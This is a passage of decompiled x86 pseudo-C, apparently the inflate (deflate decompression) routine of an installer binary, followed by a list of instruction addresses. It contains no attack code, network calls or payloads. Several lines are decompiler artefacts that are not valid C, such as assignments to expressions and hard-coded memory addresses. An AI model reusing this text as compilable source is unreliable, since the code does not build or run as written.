                                  												if( *(__ebp - 0x34) == 0) {
                                  													goto L182;
                                  												}
                                  												L115:
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                  												__ecx = __ebx;
                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  												__ebx = __ebx + 8;
                                  												__eflags = __ebx;
                                  											}
                                  											L117:
                                  											 *(0x409394 + __eax * 2) & 0x0000ffff =  *(0x409394 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                  											__esi[1] = __esi[1] + ( *(0x409394 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                  											__ecx = __eax;
                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                  											__ebx = __ebx - __eax;
                                  											__eflags = __ebx;
                                  											__eax = __esi[4] & 0x000000ff;
                                  											__esi[3] = __esi[4] & 0x000000ff;
                                  											__eax = __esi[6];
                                  											__esi[2] = __esi[6];
                                  											 *__esi = 3;
                                  											goto L118;
                                  										case 3:
                                  											L118:
                                  											__eax = __esi[3];
                                  											while(1) {
                                  												L121:
                                  												__eflags = __ebx - __eax;
                                  												if(__ebx >= __eax) {
                                  													break;
                                  												}
                                  												L119:
                                  												__eflags =  *(__ebp - 0x34);
                                  												if( *(__ebp - 0x34) == 0) {
                                  													goto L182;
                                  												}
                                  												L120:
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                  												__ecx = __ebx;
                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  												__ebx = __ebx + 8;
                                  												__eflags = __ebx;
                                  											}
                                  											L122:
                                  											__eax =  *(0x409394 + __eax * 2) & 0x0000ffff;
                                  											__eax = __eax &  *(__ebp - 0x40);
                                  											__ecx = __esi[2];
                                  											__eax = __esi[2] + __eax * 4;
                                  											__ecx =  *(__eax + 1) & 0x000000ff;
                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                  											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                  											__ecx =  *__eax & 0x000000ff;
                                  											__eflags = __cl & 0x00000010;
                                  											if((__cl & 0x00000010) == 0) {
                                  												L124:
                                  												__eflags = __cl & 0x00000040;
                                  												if((__cl & 0x00000040) != 0) {
                                  													goto L9;
                                  												}
                                  												L125:
                                  												__esi[3] = __ecx;
                                  												__ecx =  *(__eax + 2) & 0x0000ffff;
                                  												__esi[2] = __eax;
                                  												goto L180;
                                  											}
                                  											L123:
                                  											__esi[2] = __ecx;
                                  											__esi[3] = __eax;
                                  											 *__esi = 4;
                                  											goto L180;
                                  										case 4:
                                  											L126:
                                  											__eax = __esi[2];
                                  											while(1) {
                                  												L129:
                                  												__eflags = __ebx - __eax;
                                  												if(__ebx >= __eax) {
                                  													break;
                                  												}
                                  												L127:
                                  												__eflags =  *(__ebp - 0x34);
                                  												if( *(__ebp - 0x34) == 0) {
                                  													goto L182;
                                  												}
                                  												L128:
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                  												__ecx = __ebx;
                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  												__ebx = __ebx + 8;
                                  												__eflags = __ebx;
                                  											}
                                  											L130:
                                  											 *(0x409394 + __eax * 2) & 0x0000ffff =  *(0x409394 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                  											__esi[3] = __esi[3] + ( *(0x409394 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                  											__ecx = __eax;
                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                  											__ebx = __ebx - __eax;
                                  											__eflags = __ebx;
                                  											 *__esi = 5;
                                  											goto L131;
                                  										case 5:
                                  											L131:
                                  											__eax =  *(__ebp - 0x30);
                                  											__edx = __esi[3];
                                  											__eax = __eax - __esi;
                                  											__ecx = __eax - __esi - 0x1ba0;
                                  											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                  											if(__eax - __esi - 0x1ba0 >= __edx) {
                                  												__ecx = __eax;
                                  												__ecx = __eax - __edx;
                                  												__eflags = __ecx;
                                  											} else {
                                  												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                  												__ecx = __esi[0x26e8] - __edx - __esi;
                                  												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                  											}
                                  											__eflags = __esi[1];
                                  											 *(__ebp - 0x20) = __ecx;
                                  											if(__esi[1] != 0) {
                                  												L135:
                                  												__edi =  *(__ebp - 0x2c);
                                  												do {
                                  													L136:
                                  													__eflags = __edi;
                                  													if(__edi != 0) {
                                  														goto L152;
                                  													}
                                  													L137:
                                  													__edi = __esi[0x26e8];
                                  													__eflags = __eax - __edi;
                                  													if(__eax != __edi) {
                                  														L143:
                                  														__esi[0x26ea] = __eax;
                                  														__eax = E00406A32( *((intOrPtr*)(__ebp + 8)));
                                  														__eax = __esi[0x26ea];
                                  														__ecx = __esi[0x26e9];
                                  														__eflags = __eax - __ecx;
                                  														 *(__ebp - 0x30) = __eax;
                                  														if(__eax >= __ecx) {
                                  															__edi = __esi[0x26e8];
                                  															__edi = __esi[0x26e8] - __eax;
                                  															__eflags = __edi;
                                  														} else {
                                  															__ecx = __ecx - __eax;
                                  															__edi = __ecx - __eax - 1;
                                  														}
                                  														__edx = __esi[0x26e8];
                                  														__eflags = __eax - __edx;
                                  														 *(__ebp - 8) = __edx;
                                  														if(__eax == __edx) {
                                  															__edx =  &(__esi[0x6e8]);
                                  															__eflags = __ecx - __edx;
                                  															if(__ecx != __edx) {
                                  																__eax = __edx;
                                  																__eflags = __eax - __ecx;
                                  																 *(__ebp - 0x30) = __eax;
                                  																if(__eax >= __ecx) {
                                  																	__edi =  *(__ebp - 8);
                                  																	__edi =  *(__ebp - 8) - __eax;
                                  																	__eflags = __edi;
                                  																} else {
                                  																	__ecx = __ecx - __eax;
                                  																	__edi = __ecx;
                                  																}
                                  															}
                                  														}
                                  														__eflags = __edi;
                                  														if(__edi == 0) {
                                  															goto L183;
                                  														} else {
                                  															goto L152;
                                  														}
                                  													}
                                  													L138:
                                  													__ecx = __esi[0x26e9];
                                  													__edx =  &(__esi[0x6e8]);
                                  													__eflags = __ecx - __edx;
                                  													if(__ecx == __edx) {
                                  														goto L143;
                                  													}
                                  													L139:
                                  													__eax = __edx;
                                  													__eflags = __eax - __ecx;
                                  													if(__eax >= __ecx) {
                                  														__edi = __edi - __eax;
                                  														__eflags = __edi;
                                  													} else {
                                  														__ecx = __ecx - __eax;
                                  														__edi = __ecx;
                                  													}
                                  													__eflags = __edi;
                                  													if(__edi == 0) {
                                  														goto L143;
                                  													}
                                  													L152:
                                  													__ecx =  *(__ebp - 0x20);
                                  													 *__eax =  *__ecx;
                                  													__eax = __eax + 1;
                                  													__ecx = __ecx + 1;
                                  													__edi = __edi - 1;
                                  													__eflags = __ecx - __esi[0x26e8];
                                  													 *(__ebp - 0x30) = __eax;
                                  													 *(__ebp - 0x20) = __ecx;
                                  													 *(__ebp - 0x2c) = __edi;
                                  													if(__ecx == __esi[0x26e8]) {
                                  														__ecx =  &(__esi[0x6e8]);
                                  														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                  													}
                                  													_t357 =  &(__esi[1]);
                                  													 *_t357 = __esi[1] - 1;
                                  													__eflags =  *_t357;
                                  												} while ( *_t357 != 0);
                                  											}
                                  											goto L23;
                                  										case 6:
                                  											L156:
                                  											__eax =  *(__ebp - 0x2c);
                                  											__edi =  *(__ebp - 0x30);
                                  											__eflags = __eax;
                                  											if(__eax != 0) {
                                  												L172:
                                  												__cl = __esi[2];
                                  												 *__edi = __cl;
                                  												__edi = __edi + 1;
                                  												__eax = __eax - 1;
                                  												 *(__ebp - 0x30) = __edi;
                                  												 *(__ebp - 0x2c) = __eax;
                                  												goto L23;
                                  											}
                                  											L157:
                                  											__ecx = __esi[0x26e8];
                                  											__eflags = __edi - __ecx;
                                  											if(__edi != __ecx) {
                                  												L163:
                                  												__esi[0x26ea] = __edi;
                                  												__eax = E00406A32( *((intOrPtr*)(__ebp + 8)));
                                  												__edi = __esi[0x26ea];
                                  												__ecx = __esi[0x26e9];
                                  												__eflags = __edi - __ecx;
                                  												 *(__ebp - 0x30) = __edi;
                                  												if(__edi >= __ecx) {
                                  													__eax = __esi[0x26e8];
                                  													__eax = __esi[0x26e8] - __edi;
                                  													__eflags = __eax;
                                  												} else {
                                  													__ecx = __ecx - __edi;
                                  													__eax = __ecx - __edi - 1;
                                  												}
                                  												__edx = __esi[0x26e8];
                                  												__eflags = __edi - __edx;
                                  												 *(__ebp - 8) = __edx;
                                  												if(__edi == __edx) {
                                  													__edx =  &(__esi[0x6e8]);
                                  													__eflags = __ecx - __edx;
                                  													if(__ecx != __edx) {
                                  														__edi = __edx;
                                  														__eflags = __edi - __ecx;
                                  														 *(__ebp - 0x30) = __edi;
                                  														if(__edi >= __ecx) {
                                  															__eax =  *(__ebp - 8);
                                  															__eax =  *(__ebp - 8) - __edi;
                                  															__eflags = __eax;
                                  														} else {
                                  															__ecx = __ecx - __edi;
                                  															__eax = __ecx;
                                  														}
                                  													}
                                  												}
                                  												__eflags = __eax;
                                  												if(__eax == 0) {
                                  													goto L183;
                                  												} else {
                                  													goto L172;
                                  												}
                                  											}
                                  											L158:
                                  											__eax = __esi[0x26e9];
                                  											__edx =  &(__esi[0x6e8]);
                                  											__eflags = __eax - __edx;
                                  											if(__eax == __edx) {
                                  												goto L163;
                                  											}
                                  											L159:
                                  											__edi = __edx;
                                  											__eflags = __edi - __eax;
                                  											if(__edi >= __eax) {
                                  												__ecx = __ecx - __edi;
                                  												__eflags = __ecx;
                                  												__eax = __ecx;
                                  											} else {
                                  												__eax = __eax - __edi;
                                  												__eax = __eax - 1;
                                  											}
                                  											__eflags = __eax;
                                  											if(__eax != 0) {
                                  												goto L172;
                                  											} else {
                                  												goto L163;
                                  											}
                                  										case 7:
                                  											L173:
                                  											__eflags = __ebx - 7;
                                  											if(__ebx > 7) {
                                  												__ebx = __ebx - 8;
                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                  												_t380 = __ebp - 0x38;
                                  												 *_t380 =  *(__ebp - 0x38) - 1;
                                  												__eflags =  *_t380;
                                  											}
                                  											goto L175;
                                  										case 8:
                                  											L4:
                                  											while(_t425 < 3) {
                                  												if( *(_t448 - 0x34) == 0) {
                                  													goto L182;
                                  												} else {
                                  													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                  													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                  													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                  													_t425 = _t425 + 8;
                                  													continue;
                                  												}
                                  											}
                                  											_t425 = _t425 - 3;
                                  											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                  											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                  											asm("sbb ecx, ecx");
                                  											_t408 = _t406 >> 1;
                                  											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                  											if(_t408 == 0) {
                                  												L24:
                                  												 *_t446 = 9;
                                  												_t436 = _t425 & 0x00000007;
                                  												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                  												_t425 = _t425 - _t436;
                                  												goto L180;
                                  											}
                                  											L6:
                                  											_t411 = _t408 - 1;
                                  											if(_t411 == 0) {
                                  												L13:
                                  												__eflags =  *0x42db38;
                                  												if( *0x42db38 != 0) {
                                  													L22:
                                  													_t412 =  *0x4093b8; // 0x9
                                  													_t446[4] = _t412;
                                  													_t413 =  *0x4093bc; // 0x5
                                  													_t446[4] = _t413;
                                  													_t414 =  *0x42c9b4; // 0x0
                                  													_t446[5] = _t414;
                                  													_t415 =  *0x42c9b0; // 0x0
                                  													_t446[6] = _t415;
                                  													L23:
                                  													 *_t446 =  *_t446 & 0x00000000;
                                  													goto L180;
                                  												} else {
                                  													_t26 = _t448 - 8;
                                  													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                  													__eflags =  *_t26;
                                  													_t416 = 0x42c9b8;
                                  													goto L15;
                                  													L20:
                                  													 *_t416 = _t438;
                                  													_t416 = _t416 + 4;
                                  													__eflags = _t416 - 0x42ce38;
                                  													if(_t416 < 0x42ce38) {
                                  														L15:
                                  														__eflags = _t416 - 0x42cbf4;
                                  														_t438 = 8;
                                  														if(_t416 > 0x42cbf4) {
                                  															__eflags = _t416 - 0x42cdb8;
                                  															if(_t416 >= 0x42cdb8) {
                                  																__eflags = _t416 - 0x42ce18;
                                  																if(_t416 < 0x42ce18) {
                                  																	_t438 = 7;
                                  																}
                                  															} else {
                                  																_t438 = 9;
                                  															}
                                  														}
                                  														goto L20;
                                  													} else {
                                  														E00406A9A(0x42c9b8, 0x120, 0x101, 0x407388, 0x4073c8, 0x42c9b4, 0x4093b8, 0x42d2b8, _t448 - 8);
                                  														_push(0x1e);
                                  														_pop(_t440);
                                  														_push(5);
                                  														_pop(_t419);
                                  														memset(0x42c9b8, _t419, _t440 << 2);
                                  														_t450 = _t450 + 0xc;
                                  														_t442 = 0x42c9b8 + _t440;
                                  														E00406A9A(0x42c9b8, 0x1e, 0, 0x407408, 0x407444, 0x42c9b0, 0x4093bc, 0x42d2b8, _t448 - 8);
                                  														 *0x42db38 =  *0x42db38 + 1;
                                  														__eflags =  *0x42db38;
                                  														goto L22;
                                  													}
                                  												}
                                  											}
                                  											L7:
                                  											_t423 = _t411 - 1;
                                  											if(_t423 == 0) {
                                  												 *_t446 = 0xb;
                                  												goto L180;
                                  											}
                                  											L8:
                                  											if(_t423 != 1) {
                                  												goto L180;
                                  											}
                                  											goto L9;
                                  										case 9:
                                  											while(1) {
                                  												L27:
                                  												__eflags = __ebx - 0x20;
                                  												if(__ebx >= 0x20) {
                                  													break;
                                  												}
                                  												L25:
                                  												__eflags =  *(__ebp - 0x34);
                                  												if( *(__ebp - 0x34) == 0) {
                                  													goto L182;
                                  												}
                                  												L26:
                                  												__eax =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  												__ecx = __ebx;
                                  												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  												__ebx = __ebx + 8;
                                  												__eflags = __ebx;
                                  											}
                                  											L28:
                                  											__eax =  *(__ebp - 0x40);
                                  											__ebx = 0;
                                  											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                  											 *(__ebp - 0x40) = 0;
                                  											__eflags = __eax;
                                  											__esi[1] = __eax;
                                  											if(__eax == 0) {
                                  												goto L53;
                                  											}
                                  											L29:
                                  											_push(0xa);
                                  											_pop(__eax);
                                  											goto L54;
                                  										case 0xa:
                                  											L30:
                                  											__eflags =  *(__ebp - 0x34);
                                  											if( *(__ebp - 0x34) == 0) {
                                  												goto L182;
                                  											}
                                  											L31:
                                  											__eax =  *(__ebp - 0x2c);
                                  											__eflags = __eax;
                                  											if(__eax != 0) {
                                  												L48:
                                  												__eflags = __eax -  *(__ebp - 0x34);
                                  												if(__eax >=  *(__ebp - 0x34)) {
                                  													__eax =  *(__ebp - 0x34);
                                  												}
                                  												__ecx = __esi[1];
                                  												__eflags = __ecx - __eax;
                                  												__edi = __ecx;
                                  												if(__ecx >= __eax) {
                                  													__edi = __eax;
                                  												}
                                  												__eax = E00405801( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                  												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                  												_t80 =  &(__esi[1]);
                                  												 *_t80 = __esi[1] - __edi;
                                  												__eflags =  *_t80;
                                  												if( *_t80 == 0) {
                                  													L53:
                                  													__eax = __esi[0x145];
                                  													L54:
                                  													 *__esi = __eax;
                                  												}
                                  												goto L180;
                                  											}
                                  											L32:
                                  											__ecx = __esi[0x26e8];
                                  											__edx =  *(__ebp - 0x30);
                                  											__eflags = __edx - __ecx;
                                  											if(__edx != __ecx) {
                                  												L38:
                                  												__esi[0x26ea] = __edx;
                                  												__eax = E00406A32( *((intOrPtr*)(__ebp + 8)));
                                  												__edx = __esi[0x26ea];
                                  												__ecx = __esi[0x26e9];
                                  												__eflags = __edx - __ecx;
                                  												 *(__ebp - 0x30) = __edx;
                                  												if(__edx >= __ecx) {
                                  													__eax = __esi[0x26e8];
                                  													__eax = __esi[0x26e8] - __edx;
                                  													__eflags = __eax;
                                  												} else {
                                  													__ecx = __ecx - __edx;
                                  													__eax = __ecx - __edx - 1;
                                  												}
                                  												__edi = __esi[0x26e8];
                                  												 *(__ebp - 0x2c) = __eax;
                                  												__eflags = __edx - __edi;
                                  												if(__edx == __edi) {
                                  													__edx =  &(__esi[0x6e8]);
                                  													__eflags = __edx - __ecx;
                                  													if(__eflags != 0) {
                                  														 *(__ebp - 0x30) = __edx;
                                  														if(__eflags >= 0) {
                                  															__edi = __edi - __edx;
                                  															__eflags = __edi;
                                  															__eax = __edi;
                                  														} else {
                                  															__ecx = __ecx - __edx;
                                  															__eax = __ecx;
                                  														}
                                  														 *(__ebp - 0x2c) = __eax;
                                  													}
                                  												}
                                  												__eflags = __eax;
                                  												if(__eax == 0) {
                                  													goto L183;
                                  												} else {
                                  													goto L48;
                                  												}
                                  											}
                                  											L33:
                                  											__eax = __esi[0x26e9];
                                  											__edi =  &(__esi[0x6e8]);
                                  											__eflags = __eax - __edi;
                                  											if(__eax == __edi) {
                                  												goto L38;
                                  											}
                                  											L34:
                                  											__edx = __edi;
                                  											__eflags = __edx - __eax;
                                  											 *(__ebp - 0x30) = __edx;
                                  											if(__edx >= __eax) {
                                  												__ecx = __ecx - __edx;
                                  												__eflags = __ecx;
                                  												__eax = __ecx;
                                  											} else {
                                  												__eax = __eax - __edx;
                                  												__eax = __eax - 1;
                                  											}
                                  											__eflags = __eax;
                                  											 *(__ebp - 0x2c) = __eax;
                                  											if(__eax != 0) {
                                  												goto L48;
                                  											} else {
                                  												goto L38;
                                  											}
                                  										case 0xb:
                                  											goto L56;
                                  										case 0xc:
                                  											L60:
                                  											__esi[1] = __esi[1] >> 0xa;
                                  											__eax = (__esi[1] >> 0xa) + 4;
                                  											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                  												goto L68;
                                  											}
                                  											goto L61;
                                  										case 0xd:
                                  											while(1) {
                                  												L93:
                                  												__eax = __esi[1];
                                  												__ecx = __esi[2];
                                  												__edx = __eax;
                                  												__eax = __eax & 0x0000001f;
                                  												__edx = __edx >> 5;
                                  												__eax = __edx + __eax + 0x102;
                                  												__eflags = __esi[2] - __eax;
                                  												if(__esi[2] >= __eax) {
                                  													break;
                                  												}
                                  												L73:
                                  												__eax = __esi[0x143];
                                  												while(1) {
                                  													L76:
                                  													__eflags = __ebx - __eax;
                                  													if(__ebx >= __eax) {
                                  														break;
                                  													}
                                  													L74:
                                  													__eflags =  *(__ebp - 0x34);
                                  													if( *(__ebp - 0x34) == 0) {
                                  														goto L182;
                                  													}
                                  													L75:
                                  													__ecx =  *(__ebp - 0x38);
                                  													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                  													__ecx = __ebx;
                                  													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  													__ebx = __ebx + 8;
                                  													__eflags = __ebx;
                                  												}
                                  												L77:
                                  												__eax =  *(0x409394 + __eax * 2) & 0x0000ffff;
                                  												__eax = __eax &  *(__ebp - 0x40);
                                  												__ecx = __esi[0x144];
                                  												__eax = __esi[0x144] + __eax * 4;
                                  												__edx =  *(__eax + 1) & 0x000000ff;
                                  												__eax =  *(__eax + 2) & 0x0000ffff;
                                  												__eflags = __eax - 0x10;
                                  												 *(__ebp - 0x14) = __eax;
                                  												if(__eax >= 0x10) {
                                  													L79:
                                  													__eflags = __eax - 0x12;
                                  													if(__eax != 0x12) {
                                  														__eax = __eax + 0xfffffff2;
                                  														 *(__ebp - 8) = 3;
                                  													} else {
                                  														_push(7);
                                  														 *(__ebp - 8) = 0xb;
                                  														_pop(__eax);
                                  													}
                                  													while(1) {
                                  														L84:
                                  														__ecx = __eax + __edx;
                                  														__eflags = __ebx - __eax + __edx;
                                  														if(__ebx >= __eax + __edx) {
                                  															break;
                                  														}
                                  														L82:
                                  														__eflags =  *(__ebp - 0x34);
                                  														if( *(__ebp - 0x34) == 0) {
                                  															goto L182;
                                  														}
                                  														L83:
                                  														__ecx =  *(__ebp - 0x38);
                                  														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                  														__ecx = __ebx;
                                  														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  														__ebx = __ebx + 8;
                                  														__eflags = __ebx;
                                  													}
                                  													L85:
                                  													__ecx = __edx;
                                  													__ebx = __ebx - __edx;
                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                  													 *(0x409394 + __eax * 2) & 0x0000ffff =  *(0x409394 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                  													__edx =  *(__ebp - 8);
                                  													__ebx = __ebx - __eax;
                                  													__edx =  *(__ebp - 8) + ( *(0x409394 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                  													__ecx = __eax;
                                  													__eax = __esi[1];
                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                  													__ecx = __esi[2];
                                  													__eax = __eax >> 5;
                                  													__edi = __eax >> 0x00000005 & 0x0000001f;
                                  													__eax = __eax & 0x0000001f;
                                  													__eax = __edi + __eax + 0x102;
                                  													__edi = __edx + __ecx;
                                  													__eflags = __edx + __ecx - __eax;
                                  													if(__edx + __ecx > __eax) {
                                  														goto L9;
                                  													}
                                  													L86:
                                  													__eflags =  *(__ebp - 0x14) - 0x10;
                                  													if( *(__ebp - 0x14) != 0x10) {
                                  														L89:
                                  														__edi = 0;
                                  														__eflags = 0;
                                  														L90:
                                  														__eax = __esi + 0xc + __ecx * 4;
                                  														do {
                                  															L91:
                                  															 *__eax = __edi;
                                  															__ecx = __ecx + 1;
                                  															__eax = __eax + 4;
                                  															__edx = __edx - 1;
                                  															__eflags = __edx;
                                  														} while (__edx != 0);
                                  														__esi[2] = __ecx;
                                  														continue;
                                  													}
                                  													L87:
                                  													__eflags = __ecx - 1;
                                  													if(__ecx < 1) {
                                  														goto L9;
                                  													}
                                  													L88:
                                  													__edi =  *(__esi + 8 + __ecx * 4);
                                  													goto L90;
                                  												}
                                  												L78:
                                  												__ecx = __edx;
                                  												__ebx = __ebx - __edx;
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                  												__ecx = __esi[2];
                                  												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                  												__esi[2] = __esi[2] + 1;
                                  											}
                                  											L94:
                                  											__eax = __esi[1];
                                  											__esi[0x144] = __esi[0x144] & 0x00000000;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                  											__edi = __eax;
                                  											__eax = __eax >> 5;
                                  											__edi = __edi & 0x0000001f;
                                  											__ecx = 0x101;
                                  											__eax = __eax & 0x0000001f;
                                  											__edi = __edi + 0x101;
                                  											__eax = __eax + 1;
                                  											__edx = __ebp - 0xc;
                                  											 *(__ebp - 0x14) = __eax;
                                  											 &(__esi[0x148]) = __ebp - 4;
                                  											 *(__ebp - 4) = 9;
                                  											__ebp - 0x18 =  &(__esi[3]);
                                  											 *(__ebp - 0x10) = 6;
                                  											__eax = E00406A9A( &(__esi[3]), __edi, 0x101, 0x407388, 0x4073c8, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                  											__eflags =  *(__ebp - 4);
                                  											if( *(__ebp - 4) == 0) {
                                  												__eax = __eax | 0xffffffff;
                                  												__eflags = __eax;
                                  											}
                                  											__eflags = __eax;
                                  											if(__eax != 0) {
                                  												goto L9;
                                  											} else {
                                  												L97:
                                  												__ebp - 0xc =  &(__esi[0x148]);
                                  												__ebp - 0x10 = __ebp - 0x1c;
                                  												__eax = __esi + 0xc + __edi * 4;
                                  												__eax = E00406A9A(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x407408, 0x407444, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                  												__eflags = __eax;
                                  												if(__eax != 0) {
                                  													goto L9;
                                  												}
                                  												L98:
                                  												__eax =  *(__ebp - 0x10);
                                  												__eflags =  *(__ebp - 0x10);
                                  												if( *(__ebp - 0x10) != 0) {
                                  													L100:
                                  													__cl =  *(__ebp - 4);
                                  													 *__esi =  *__esi & 0x00000000;
                                  													__eflags =  *__esi;
                                  													__esi[4] = __al;
                                  													__eax =  *(__ebp - 0x18);
                                  													__esi[5] =  *(__ebp - 0x18);
                                  													__eax =  *(__ebp - 0x1c);
                                  													__esi[4] = __cl;
                                  													__esi[6] =  *(__ebp - 0x1c);
                                  													goto L101;
                                  												}
                                  												L99:
                                  												__eflags = __edi - 0x101;
                                  												if(__edi > 0x101) {
                                  													goto L9;
                                  												}
                                  												goto L100;
                                  											}
                                  										case 0xe:
                                  											goto L9;
                                  										case 0xf:
                                  											L175:
                                  											__eax =  *(__ebp - 0x30);
                                  											__esi[0x26ea] =  *(__ebp - 0x30);
                                  											__eax = E00406A32( *((intOrPtr*)(__ebp + 8)));
                                  											__ecx = __esi[0x26ea];
                                  											__edx = __esi[0x26e9];
                                  											__eflags = __ecx - __edx;
                                  											 *(__ebp - 0x30) = __ecx;
                                  											if(__ecx >= __edx) {
                                  												__eax = __esi[0x26e8];
                                  												__eax = __esi[0x26e8] - __ecx;
                                  												__eflags = __eax;
                                  											} else {
                                  												__edx = __edx - __ecx;
                                  												__eax = __edx - __ecx - 1;
                                  											}
                                  											__eflags = __ecx - __edx;
                                  											 *(__ebp - 0x2c) = __eax;
                                  											if(__ecx != __edx) {
                                  												L183:
                                  												__edi = 0;
                                  												goto L10;
                                  											} else {
                                  												L179:
                                  												__eax = __esi[0x145];
                                  												__eflags = __eax - 8;
                                  												 *__esi = __eax;
                                  												if(__eax != 8) {
                                  													L184:
                                  													0 = 1;
                                  													goto L10;
                                  												}
                                  												goto L180;
                                  											}
                                  									}
                                  								}
                                  								L181:
                                  								goto L9;
                                  							}
                                  							L70:
                                  							if( *__edi == __eax) {
                                  								goto L72;
                                  							}
                                  							L71:
                                  							__esi[2] = __esi[2] & __eax;
                                  							 *__esi = 0xd;
                                  							goto L93;
                                  						}
                                  					}
                                  				}
                                  				L182:
                                  				_t443 = 0;
                                  				_t446[0x147] =  *(_t448 - 0x40);
                                  				_t446[0x146] = _t425;
                                  				( *(_t448 + 8))[1] = 0;
                                  				goto L11;
                                  			}









                                  0x0040678e
                                  0x00000000
                                  0x00000000
                                  0x0040676c
                                  0x0040676c
                                  0x00406770
                                  0x00000000
                                  0x00000000
                                  0x00406776
                                  0x00406776
                                  0x00406779
                                  0x0040677c
                                  0x0040677f
                                  0x00406781
                                  0x00406783
                                  0x00406786
                                  0x00406789
                                  0x00406789
                                  0x00406789
                                  0x00406790
                                  0x00406798
                                  0x0040679b
                                  0x0040679e
                                  0x004067a0
                                  0x004067a3
                                  0x004067a3
                                  0x004067a5
                                  0x00000000
                                  0x00000000
                                  0x004067ab
                                  0x004067ab
                                  0x004067ae
                                  0x004067b3
                                  0x004067b5
                                  0x004067bb
                                  0x004067bd
                                  0x004067d2
                                  0x004067d4
                                  0x004067d4
                                  0x004067bf
                                  0x004067c5
                                  0x004067c7
                                  0x004067c9
                                  0x004067c9
                                  0x004067d6
                                  0x004067da
                                  0x004067dd
                                  0x004067e3
                                  0x004067e3
                                  0x004067e6
                                  0x004067e6
                                  0x004067e6
                                  0x004067e8
                                  0x00000000
                                  0x00000000
                                  0x004067ee
                                  0x004067ee
                                  0x004067f4
                                  0x004067f6
